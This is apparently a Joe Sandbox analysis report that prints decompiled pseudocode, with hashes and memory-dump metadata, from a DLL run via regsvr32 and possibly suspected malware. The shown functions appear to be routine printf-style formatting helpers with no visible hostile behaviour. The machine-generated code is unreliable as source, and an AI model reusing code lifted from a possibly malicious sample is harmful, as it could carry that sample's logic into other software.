                                                                      				signed int _t119;
                                                                      				intOrPtr _t130;
                                                                      				void* _t134;
                                                                      				void* _t141;
                                                                      				void* _t144;
                                                                      				intOrPtr _t150;
                                                                      				void* _t157;
                                                                      				void* _t159;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t134 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t87 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t111 = _t87 - 5;
                                                                      				if (_t111 > 0) goto 0x8001e11f;
                                                                      				if (_t111 == 0) goto 0x8001e088;
                                                                      				_t112 = _t87;
                                                                      				if (_t112 == 0) goto 0x8001e173;
                                                                      				if (_t112 == 0) goto 0x8001e0f7;
                                                                      				if (_t112 == 0) goto 0x8001e0d0;
                                                                      				if (_t112 == 0) goto 0x8001e173;
                                                                      				if (_t87 - 0xffffffffffffffff != 1) goto 0x8001e13f;
                                                                      				_t91 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t144;
                                                                      				if ((_t91 >> 0x00000004 & 0x00000001) == 0) goto 0x8001e0ba;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001e0ba;
                                                                      				 *(__rcx + 0x28) = _t91 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001e19e;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001e1b5;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001e0f1;
                                                                      				goto 0x8001e0a3;
                                                                      				goto 0x8001e0a3;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t119 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t119 == 0) goto 0x8001e119;
                                                                      				goto 0x8001e0a3;
                                                                      				goto 0x8001e0a3;
                                                                      				if (_t119 == 0) goto 0x8001e088;
                                                                      				if (_t119 == 0) goto 0x8001e088;
                                                                      				if (_t119 == 0) goto 0x8001e088;
                                                                      				goto 0x8001e076;
                                                                      				_t130 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t130 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t130 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t141,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, _t157);
                                                                      				goto 0x8001e20e;
                                                                      				 *((long long*)(_t134 + 0x18)) =  *((long long*)(_t134 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001e196;
                                                                      				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8));
                                                                      				goto 0x8001e0a3;
                                                                      				goto 0x8001e0a3;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xfffffff7;
                                                                      				E00000001180023018(_t134, _t134 + 0x50,  *((intOrPtr*)(_t134 + 0x30)), _t150,  *((intOrPtr*)(_t134 + 8)));
                                                                      				if (_t150 != 0) goto 0x8001e1be;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t134 + 0x4c)) = 1;
                                                                      				r8b = bpl;
                                                                      				if (_t144 != 8) goto 0x8001e1d8;
                                                                      				E00000001180026B18(0, _t134, _t150, _t159);
                                                                      				goto 0x8001e1df;
                                                                      				E00000001180026BA0( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8)), _t134, _t159);
                                                                      				if (0 == 0) goto 0x8001e20c;
                                                                      				if ( *((intOrPtr*)(_t134 + 0x48)) == 0) goto 0x8001e1fd;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x40)))) == 0x30) goto 0x8001e20c;
                                                                      				 *((long long*)(_t134 + 0x40)) =  *((long long*)(_t134 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t134 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t134 + 0x48)) =  *((intOrPtr*)(_t134 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}

















                                                                      0x18001e038
                                                                      0x18001e03d
                                                                      0x18001e042
                                                                      0x18001e04c
                                                                      0x18001e04f
                                                                      0x18001e052
                                                                      0x18001e055
                                                                      0x18001e058
                                                                      0x18001e05e
                                                                      0x18001e060
                                                                      0x18001e062
                                                                      0x18001e06b
                                                                      0x18001e074
                                                                      0x18001e079
                                                                      0x18001e082
                                                                      0x18001e088
                                                                      0x18001e090
                                                                      0x18001e0aa
                                                                      0x18001e0af
                                                                      0x18001e0b7
                                                                      0x18001e0be
                                                                      0x18001e0c4
                                                                      0x18001e0cb
                                                                      0x18001e0d8
                                                                      0x18001e0e8
                                                                      0x18001e0ef
                                                                      0x18001e0f5
                                                                      0x18001e0ff
                                                                      0x18001e109
                                                                      0x18001e110
                                                                      0x18001e117
                                                                      0x18001e11d
                                                                      0x18001e122
                                                                      0x18001e12b
                                                                      0x18001e134
                                                                      0x18001e13a
                                                                      0x18001e13f
                                                                      0x18001e143
                                                                      0x18001e146
                                                                      0x18001e14d
                                                                      0x18001e151
                                                                      0x18001e15c
                                                                      0x18001e161
                                                                      0x18001e167
                                                                      0x18001e16e
                                                                      0x18001e17b
                                                                      0x18001e18b
                                                                      0x18001e18d
                                                                      0x18001e191
                                                                      0x18001e199
                                                                      0x18001e1a9
                                                                      0x18001e1b0
                                                                      0x18001e1b8
                                                                      0x18001e1ba
                                                                      0x18001e1be
                                                                      0x18001e1c2
                                                                      0x18001e1cc
                                                                      0x18001e1d1
                                                                      0x18001e1d6
                                                                      0x18001e1da
                                                                      0x18001e1e7
                                                                      0x18001e1f2
                                                                      0x18001e1fb
                                                                      0x18001e1fd
                                                                      0x18001e206
                                                                      0x18001e209
                                                                      0x18001e222

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b07558407be177afa65e52977ca332e54705e70cf5a3e673dfb8e86e36d7817c
                                                                      • Instruction ID: ea6536fc57f43b14966adb3896d6ef01e9fd8cac2a835b3722c257558e93f40a
                                                                      • Opcode Fuzzy Hash: b07558407be177afa65e52977ca332e54705e70cf5a3e673dfb8e86e36d7817c
                                                                      • Instruction Fuzzy Hash: CC51D473614A9883E7AB8F28C0543AC27A0E35EBA8F148116EF45177D9CF75CE89C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 72%
                                                                      			E0000000118001E224(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t87;
                                                                      				signed int _t91;
                                                                      				void* _t111;
                                                                      				intOrPtr _t112;
                                                                      				signed int _t119;
                                                                      				intOrPtr _t130;
                                                                      				void* _t134;
                                                                      				void* _t141;
                                                                      				void* _t144;
                                                                      				intOrPtr _t150;
                                                                      				void* _t157;
                                                                      				void* _t159;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t134 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t87 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t111 = _t87 - 5;
                                                                      				if (_t111 > 0) goto 0x8001e30b;
                                                                      				if (_t111 == 0) goto 0x8001e274;
                                                                      				_t112 = _t87;
                                                                      				if (_t112 == 0) goto 0x8001e35f;
                                                                      				if (_t112 == 0) goto 0x8001e2e3;
                                                                      				if (_t112 == 0) goto 0x8001e2bc;
                                                                      				if (_t112 == 0) goto 0x8001e35f;
                                                                      				if (_t87 - 0xffffffffffffffff != 1) goto 0x8001e32b;
                                                                      				_t91 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t144;
                                                                      				if ((_t91 >> 0x00000004 & 0x00000001) == 0) goto 0x8001e2a6;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001e2a6;
                                                                      				 *(__rcx + 0x28) = _t91 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001e38a;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001e3a1;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001e2dd;
                                                                      				goto 0x8001e28f;
                                                                      				goto 0x8001e28f;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t119 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t119 == 0) goto 0x8001e305;
                                                                      				goto 0x8001e28f;
                                                                      				goto 0x8001e28f;
                                                                      				if (_t119 == 0) goto 0x8001e274;
                                                                      				if (_t119 == 0) goto 0x8001e274;
                                                                      				if (_t119 == 0) goto 0x8001e274;
                                                                      				goto 0x8001e262;
                                                                      				_t130 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t130 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t130 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t141,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, _t157);
                                                                      				goto 0x8001e3fa;
                                                                      				 *((long long*)(_t134 + 0x18)) =  *((long long*)(_t134 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001e382;
                                                                      				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8));
                                                                      				goto 0x8001e28f;
                                                                      				goto 0x8001e28f;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xfffffff7;
                                                                      				E00000001180023018(_t134, _t134 + 0x50,  *((intOrPtr*)(_t134 + 0x30)), _t150,  *((intOrPtr*)(_t134 + 8)));
                                                                      				if (_t150 != 0) goto 0x8001e3aa;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t134 + 0x4c)) = 1;
                                                                      				r8b = bpl;
                                                                      				if (_t144 != 8) goto 0x8001e3c4;
                                                                      				E00000001180026C28(_t134, _t150);
                                                                      				goto 0x8001e3cb;
                                                                      				E00000001180026CE8( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8)), _t134, _t150, _t159);
                                                                      				if (0 == 0) goto 0x8001e3f8;
                                                                      				if ( *((intOrPtr*)(_t134 + 0x48)) == 0) goto 0x8001e3e9;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x40)))) == 0x30) goto 0x8001e3f8;
                                                                      				 *((long long*)(_t134 + 0x40)) =  *((long long*)(_t134 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t134 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t134 + 0x48)) =  *((intOrPtr*)(_t134 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}

















                                                                      0x18001e224
                                                                      0x18001e229
                                                                      0x18001e22e
                                                                      0x18001e238
                                                                      0x18001e23b
                                                                      0x18001e23e
                                                                      0x18001e241
                                                                      0x18001e244
                                                                      0x18001e24a
                                                                      0x18001e24c
                                                                      0x18001e24e
                                                                      0x18001e257
                                                                      0x18001e260
                                                                      0x18001e265
                                                                      0x18001e26e
                                                                      0x18001e274
                                                                      0x18001e27c
                                                                      0x18001e296
                                                                      0x18001e29b
                                                                      0x18001e2a3
                                                                      0x18001e2aa
                                                                      0x18001e2b0
                                                                      0x18001e2b7
                                                                      0x18001e2c4
                                                                      0x18001e2d4
                                                                      0x18001e2db
                                                                      0x18001e2e1
                                                                      0x18001e2eb
                                                                      0x18001e2f5
                                                                      0x18001e2fc
                                                                      0x18001e303
                                                                      0x18001e309
                                                                      0x18001e30e
                                                                      0x18001e317
                                                                      0x18001e320
                                                                      0x18001e326
                                                                      0x18001e32b
                                                                      0x18001e32f
                                                                      0x18001e332
                                                                      0x18001e339
                                                                      0x18001e33d
                                                                      0x18001e348
                                                                      0x18001e34d
                                                                      0x18001e353
                                                                      0x18001e35a
                                                                      0x18001e367
                                                                      0x18001e377
                                                                      0x18001e379
                                                                      0x18001e37d
                                                                      0x18001e385
                                                                      0x18001e395
                                                                      0x18001e39c
                                                                      0x18001e3a4
                                                                      0x18001e3a6
                                                                      0x18001e3aa
                                                                      0x18001e3ae
                                                                      0x18001e3b8
                                                                      0x18001e3bd
                                                                      0x18001e3c2
                                                                      0x18001e3c6
                                                                      0x18001e3d3
                                                                      0x18001e3de
                                                                      0x18001e3e7
                                                                      0x18001e3e9
                                                                      0x18001e3f2
                                                                      0x18001e3f5
                                                                      0x18001e40e

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: af039c89ef7a4e3a6d5be22e636091dfed77e6bc7ea8cd418e0abefb5796f5cd
                                                                      • Instruction ID: 05f32518d4f255516c4594693e14fc5aef5e8041d88788b20eaf4ba2342834d5
                                                                      • Opcode Fuzzy Hash: af039c89ef7a4e3a6d5be22e636091dfed77e6bc7ea8cd418e0abefb5796f5cd
                                                                      • Instruction Fuzzy Hash: EE51B673604E9882E7AA8F28C1587BC37A0E35AB98F158216EF55177D8CF31DE85C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E0000000118001B0C4(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t87;
                                                                      				signed int _t91;
                                                                      				void* _t111;
                                                                      				intOrPtr _t112;
                                                                      				signed int _t119;
                                                                      				intOrPtr _t130;
                                                                      				void* _t134;
                                                                      				void* _t141;
                                                                      				void* _t144;
                                                                      				intOrPtr _t150;
                                                                      				void* _t157;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t134 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t87 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t111 = _t87 - 5;
                                                                      				if (_t111 > 0) goto 0x8001b1ab;
                                                                      				if (_t111 == 0) goto 0x8001b114;
                                                                      				_t112 = _t87;
                                                                      				if (_t112 == 0) goto 0x8001b1ff;
                                                                      				if (_t112 == 0) goto 0x8001b183;
                                                                      				if (_t112 == 0) goto 0x8001b15c;
                                                                      				if (_t112 == 0) goto 0x8001b1ff;
                                                                      				if (_t87 - 0xffffffffffffffff != 1) goto 0x8001b1cb;
                                                                      				_t91 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t144;
                                                                      				if ((_t91 >> 0x00000004 & 0x00000001) == 0) goto 0x8001b146;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001b146;
                                                                      				 *(__rcx + 0x28) = _t91 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001b22a;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001b241;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001b17d;
                                                                      				goto 0x8001b12f;
                                                                      				goto 0x8001b12f;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t119 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t119 == 0) goto 0x8001b1a5;
                                                                      				goto 0x8001b12f;
                                                                      				goto 0x8001b12f;
                                                                      				if (_t119 == 0) goto 0x8001b114;
                                                                      				if (_t119 == 0) goto 0x8001b114;
                                                                      				if (_t119 == 0) goto 0x8001b114;
                                                                      				goto 0x8001b102;
                                                                      				_t130 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t130 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t130 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t141,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, _t157);
                                                                      				goto 0x8001b29a;
                                                                      				 *((long long*)(_t134 + 0x18)) =  *((long long*)(_t134 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001b222;
                                                                      				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8));
                                                                      				goto 0x8001b12f;
                                                                      				goto 0x8001b12f;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xfffffff7;
                                                                      				E00000001180023018(_t134, _t134 + 0x50,  *((intOrPtr*)(_t134 + 0x30)), _t150,  *((intOrPtr*)(_t134 + 8)));
                                                                      				if (_t150 != 0) goto 0x8001b24a;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t134 + 0x4c)) = 1;
                                                                      				r8b = bpl;
                                                                      				if (_t144 != 8) goto 0x8001b264;
                                                                      				E00000001180024134(0, _t134, _t150);
                                                                      				goto 0x8001b26b;
                                                                      				E000000011800241D8( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8)), _t134);
                                                                      				if (0 == 0) goto 0x8001b298;
                                                                      				if ( *((intOrPtr*)(_t134 + 0x48)) == 0) goto 0x8001b289;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x40)))) == 0x30) goto 0x8001b298;
                                                                      				 *((long long*)(_t134 + 0x40)) =  *((long long*)(_t134 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t134 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t134 + 0x48)) =  *((intOrPtr*)(_t134 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}
















                                                                      0x18001b0c4
                                                                      0x18001b0c9
                                                                      0x18001b0ce
                                                                      0x18001b0d8
                                                                      0x18001b0db
                                                                      0x18001b0de
                                                                      0x18001b0e1
                                                                      0x18001b0e4
                                                                      0x18001b0ea
                                                                      0x18001b0ec
                                                                      0x18001b0ee
                                                                      0x18001b0f7
                                                                      0x18001b100
                                                                      0x18001b105
                                                                      0x18001b10e
                                                                      0x18001b114
                                                                      0x18001b11c
                                                                      0x18001b136
                                                                      0x18001b13b
                                                                      0x18001b143
                                                                      0x18001b14a
                                                                      0x18001b150
                                                                      0x18001b157
                                                                      0x18001b164
                                                                      0x18001b174
                                                                      0x18001b17b
                                                                      0x18001b181
                                                                      0x18001b18b
                                                                      0x18001b195
                                                                      0x18001b19c
                                                                      0x18001b1a3
                                                                      0x18001b1a9
                                                                      0x18001b1ae
                                                                      0x18001b1b7
                                                                      0x18001b1c0
                                                                      0x18001b1c6
                                                                      0x18001b1cb
                                                                      0x18001b1cf
                                                                      0x18001b1d2
                                                                      0x18001b1d9
                                                                      0x18001b1dd
                                                                      0x18001b1e8
                                                                      0x18001b1ed
                                                                      0x18001b1f3
                                                                      0x18001b1fa
                                                                      0x18001b207
                                                                      0x18001b217
                                                                      0x18001b219
                                                                      0x18001b21d
                                                                      0x18001b225
                                                                      0x18001b235
                                                                      0x18001b23c
                                                                      0x18001b244
                                                                      0x18001b246
                                                                      0x18001b24a
                                                                      0x18001b24e
                                                                      0x18001b258
                                                                      0x18001b25d
                                                                      0x18001b262
                                                                      0x18001b266
                                                                      0x18001b273
                                                                      0x18001b27e
                                                                      0x18001b287
                                                                      0x18001b289
                                                                      0x18001b292
                                                                      0x18001b295
                                                                      0x18001b2ae

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0fcef25aa6d79a7de15f97295194358ec90f2ee9dde0be1d282b8badad1bccc5
                                                                      • Instruction ID: 6d441e2f87f6fa47e30d8d93f4696f957d8887940594f1753597fb0dfc867812
                                                                      • Opcode Fuzzy Hash: 0fcef25aa6d79a7de15f97295194358ec90f2ee9dde0be1d282b8badad1bccc5
                                                                      • Instruction Fuzzy Hash: 1651C273600A1892E7AA8F28D0653BC37A4E359FA8F568215EF45977D8CF31CE49C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E0000000118002713C(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t87;
                                                                      				signed int _t91;
                                                                      				void* _t111;
                                                                      				intOrPtr _t112;
                                                                      				signed int _t119;
                                                                      				intOrPtr _t130;
                                                                      				void* _t134;
                                                                      				void* _t141;
                                                                      				void* _t144;
                                                                      				intOrPtr _t150;
                                                                      				void* _t157;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t134 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t87 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t111 = _t87 - 5;
                                                                      				if (_t111 > 0) goto 0x80027223;
                                                                      				if (_t111 == 0) goto 0x8002718c;
                                                                      				_t112 = _t87;
                                                                      				if (_t112 == 0) goto 0x80027277;
                                                                      				if (_t112 == 0) goto 0x800271fb;
                                                                      				if (_t112 == 0) goto 0x800271d4;
                                                                      				if (_t112 == 0) goto 0x80027277;
                                                                      				if (_t87 - 0xffffffffffffffff != 1) goto 0x80027243;
                                                                      				_t91 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t144;
                                                                      				if ((_t91 >> 0x00000004 & 0x00000001) == 0) goto 0x800271be;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x800271be;
                                                                      				 *(__rcx + 0x28) = _t91 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x800272a2;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x800272b9;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x800271f5;
                                                                      				goto 0x800271a7;
                                                                      				goto 0x800271a7;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t119 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t119 == 0) goto 0x8002721d;
                                                                      				goto 0x800271a7;
                                                                      				goto 0x800271a7;
                                                                      				if (_t119 == 0) goto 0x8002718c;
                                                                      				if (_t119 == 0) goto 0x8002718c;
                                                                      				if (_t119 == 0) goto 0x8002718c;
                                                                      				goto 0x8002717a;
                                                                      				_t130 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t130 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t130 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t141,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, _t157);
                                                                      				goto 0x80027312;
                                                                      				 *((long long*)(_t134 + 0x18)) =  *((long long*)(_t134 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8002729a;
                                                                      				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8));
                                                                      				goto 0x800271a7;
                                                                      				goto 0x800271a7;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xfffffff7;
                                                                      				E00000001180023018(_t134, _t134 + 0x50,  *((intOrPtr*)(_t134 + 0x30)), _t150,  *((intOrPtr*)(_t134 + 8)));
                                                                      				if (_t150 != 0) goto 0x800272c2;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t134 + 0x4c)) = 1;
                                                                      				r8b = bpl;
                                                                      				if (_t144 != 8) goto 0x800272dc;
                                                                      				E00000001180027DA4(0, _t134, _t150);
                                                                      				goto 0x800272e3;
                                                                      				E00000001180027E48( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8)), _t134);
                                                                      				if (0 == 0) goto 0x80027310;
                                                                      				if ( *((intOrPtr*)(_t134 + 0x48)) == 0) goto 0x80027301;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x40)))) == 0x30) goto 0x80027310;
                                                                      				 *((long long*)(_t134 + 0x40)) =  *((long long*)(_t134 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t134 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t134 + 0x48)) =  *((intOrPtr*)(_t134 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}
















                                                                      0x18002713c
                                                                      0x180027141
                                                                      0x180027146
                                                                      0x180027150
                                                                      0x180027153
                                                                      0x180027156
                                                                      0x180027159
                                                                      0x18002715c
                                                                      0x180027162
                                                                      0x180027164
                                                                      0x180027166
                                                                      0x18002716f
                                                                      0x180027178
                                                                      0x18002717d
